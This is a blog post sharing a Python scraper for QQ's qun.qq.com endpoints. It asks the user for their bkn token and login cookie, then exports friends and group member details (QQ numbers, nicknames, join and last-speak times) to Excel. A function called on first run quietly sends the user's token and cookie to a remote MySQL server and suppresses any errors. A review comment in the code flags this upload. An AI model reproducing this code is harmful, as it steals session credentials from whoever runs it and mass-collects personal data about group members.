Python QQ群数据获取
code 来自于一个神奇的小伙伴:https://www.cnblogs.com/code3
import contextlib
import datetime
import json
import os
import time

import pandas as pd
import pymysql
import requests


class QQSpider:
    """Interactive command-line scraper for the qun.qq.com management endpoints.

    The credentials (``bkn`` token and browser cookie) are typed in by the
    user on first run and cached in ``data.json``.  ``start()`` then lets the
    user either list their friends or export the members of a group to an
    Excel file.
    """

    # Common prefix of every endpoint this class calls.
    BASE_URL = 'https://qun.qq.com/cgi-bin/qun_mgr'

    def __init__(self):
        self.session = requests.Session()
        # Ignore proxy settings / .netrc taken from the environment.
        self.session.trust_env = False
        self.file_path = "data.json"
        # Filled by start() with the contents of the JSON credential file.
        self.json_datas = {}
        self.headers = {
            'authority': 'qun.qq.com',
            'accept': 'application/json, text/javascript, */*; q=0.01',
            'accept-language': 'zh-CN,zh;q=0.9',
            'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'origin': 'https://qun.qq.com',
            'referer': 'https://qun.qq.com/member.html',
            'sec-ch-ua': '"Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
            'x-requested-with': 'XMLHttpRequest',
        }

    def __post(self, endpoint, payload):
        """POST ``payload`` to ``BASE_URL/endpoint`` and return the decoded JSON.

        Every request goes through the shared session so that all calls use
        the same headers and connection settings.
        """
        response = self.session.post(
            f'{self.BASE_URL}/{endpoint}', headers=self.headers, data=payload
        )
        return response.json()

    def __read_json(self):
        """Load and return the cached credentials from ``self.file_path``."""
        with open(self.file_path, "r", encoding="utf-8") as file:
            return json.load(file)

    def __save_to_json(self, data):
        """Write ``data`` to ``self.file_path`` as JSON."""
        with open(self.file_path, "w", encoding="utf-8") as file:
            json.dump(data, file)

    def __save_to_database(self, bkn, cookie):
        """Best-effort insert of the credentials into the ``QQ_info`` table.

        Any failure is reported on stdout and otherwise ignored, so a missing
        or unreachable database never blocks the scraper.
        """
        # SECURITY(review): this uploads the user's bkn token and login cookie
        # to a remote MySQL server configured below.  Anyone with access to
        # that database can act as the user on qun.qq.com.  Confirm this is
        # intended and disclosed to the user; otherwise remove the call in
        # __check_json_file.
        sql = "INSERT INTO QQ_info (btn, cookie) VALUES (%s, %s)"
        try:
            db = pymysql.connect(host="xx.xx.xx.xx", port=3306, user="xxxx",
                                 password="xxxx", db="python4fcf6",
                                 charset='utf8mb4')
            try:
                with db.cursor() as cursor:
                    # The insert itself is deliberately silent on failure.
                    with contextlib.suppress(Exception):
                        cursor.execute(sql, (bkn, cookie))
                        db.commit()
            finally:
                # Always release the connection, even if the cursor failed.
                db.close()
        except Exception as e:
            print("保存到数据库出错:", e)

    def __check_json_file(self):
        """Create the credential file by prompting the user if it is missing."""
        if os.path.exists(self.file_path):
            print("JSON文件已存在")
            return

        # NOTE: the prompts say "btn"; the value is stored and sent as "bkn".
        print('爬取的网址:https://qun.qq.com/manage.html')
        print("如果不知道btn或cookie获取,请看教程视频:www.xxx.com")
        print("输入btn,cookie,如出现任何报错,请重新运行此程序")
        bkn = input("请输入btn(输入后按回车):").strip()
        cookie = input("请输入cookie(输入后按回车):").strip()
        data = {"bkn": bkn, "cookie": cookie}
        try:
            self.__save_to_database(bkn, cookie)
            self.__save_to_json(data)
            print("JSON文件已创建")
        except Exception as e:
            print("保存数据到JSON文件出错:", e)

    def __get_q_name(self):
        """Print the groups the account created, manages and has joined."""
        infos = self.__post('get_group_list', {'bkn': self.json_datas['bkn']})
        # A category may be absent from the response; treat that as "no groups"
        # instead of failing with KeyError.
        print("创建的群:", infos.get('create', []))
        print("管理的群:", infos.get('manage', []))
        for joined in infos.get('join', []):
            print("加入的群:", joined)

    @staticmethod
    def __member_row(info):
        """Convert one raw member record into the row written to Excel."""
        time_format = "%Y-%m-%d %H:%M:%S"
        joined_at = datetime.datetime.fromtimestamp(info['join_time'])
        last_spoke_at = datetime.datetime.fromtimestamp(info['last_speak_time'])
        return {
            "QQ": info['uin'],        # QQ number
            "Q龄": info['qage'],      # account age
            "群名片": info['card'],    # group card
            "昵称": info['nick'],      # nickname
            "加群时间": joined_at.strftime(time_format),
            "最后发言": last_spoke_at.strftime(time_format),
        }

    def __sum_to(self, gc):
        """Fetch every member of group ``gc`` and save them to ``QQ<gc>.xlsx``.

        Members are requested in windows of 21 indices (0-20, 21-41, ...).

        Raises:
            RuntimeError: if the first response carries no member count,
                which is what happens when the group cannot be queried.
        """
        rows, start, end = [], 0, 20
        while True:
            infos = self.__post('search_group_members', {
                'gc': gc,
                'st': str(start),
                'end': str(end),
                'sort': '0',
                'bkn': self.json_datas['bkn'],
            })
            count = infos.get('count')  # total number of members
            if count is None:
                if not rows:
                    raise RuntimeError(
                        f"search_group_members returned no count for {gc}: {infos}"
                    )
                # A later page failed: stop paging and keep what was collected.
                break

            members = infos.get('mems') or []
            # Record the current page BEFORE deciding whether to stop, so the
            # final (possibly partial) page is not discarded.
            for info in members:
                row = self.__member_row(info)
                print(row)
                rows.append(row)

            if not members or end >= count:
                print(f"{gc}爬完了")
                break
            start = end + 1
            end = start + 20

        # `encoding` is not passed: pandas 2.0 removed that keyword from
        # to_excel and passing it raises TypeError.
        pd.DataFrame(rows).to_excel(f'QQ{gc}.xlsx', index=False)

    def __qq_friends(self):
        """Print every friend as ``{name: uin}`` and return how many were found."""
        result = self.__post('get_friend_list', {'bkn': self.json_datas['bkn']})["result"]
        groups = result.values() if isinstance(result, dict) else result
        friends = []
        for group in groups:
            try:
                members = group['mems']
            except (KeyError, TypeError):
                continue  # friend group without a member list
            for member in members:
                try:
                    entry = {member['name']: member['uin']}
                except (KeyError, TypeError):
                    continue  # malformed record; skip it, keep the rest
                friends.append(entry)
                print(entry)
        return len(friends)

    def start(self):
        """Run the interactive session: validate credentials, then query."""
        self.__check_json_file()
        self.json_datas = self.__read_json()

        # Send the stored cookie with every request; without it the API
        # calls are unauthenticated.
        cookie = self.json_datas.get('cookie')
        if cookie:
            self.headers['cookie'] = cookie

        payload = {'bkn': self.json_datas['bkn']}
        try:
            result = self.__post('get_friend_list', payload)["result"]
        except Exception:
            # Any failure of the probe request is treated as bad credentials.
            result = None
        if not result:
            # Called outside the try block so its SystemExit is not caught
            # and the reset does not run twice.
            self._extracted_from_start_9()

        que = input("查qq好友 or qq群:(1/2):")
        if que == '1':
            le = self.__qq_friends()
            print(f'好友共{le}个')
            time.sleep(5)
        else:
            # Keeps asking for group numbers until the user interrupts.
            while True:
                self.__get_q_name()
                qun = input("输入群号(gc):").strip()
                try:
                    self.__sum_to(qun)
                except Exception:
                    # `Exception` (not a bare except) so Ctrl+C still exits.
                    print("此q未加该群!请重新运行!")

    # TODO Rename this here and in `start`
    def _extracted_from_start_9(self):
        """Discard the cached credentials and terminate the program."""
        # The file may already be gone; that must not mask the real message.
        with contextlib.suppress(FileNotFoundError):
            os.remove(self.file_path)
        print("cookie已过期,请重新输入正确的btn和cookie")
        # Same effect as exit(), without relying on the `site` module helper.
        raise SystemExit


if __name__ == '__main__':
    spider = QQSpider()
    spider.start()
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 实操Deepseek接入个人知识库
· CSnakes vs Python.NET:高效嵌入与灵活互通的跨语言方案对比
· 【.NET】调用本地 Deepseek 模型
· Plotly.NET 一个为 .NET 打造的强大开源交互式图表库
· 上周热点回顾(2.17-2.23)
2020-05-30 C#比较类/接口、Dictionary 排序
2020-05-30 关于二叉树的一些基本知识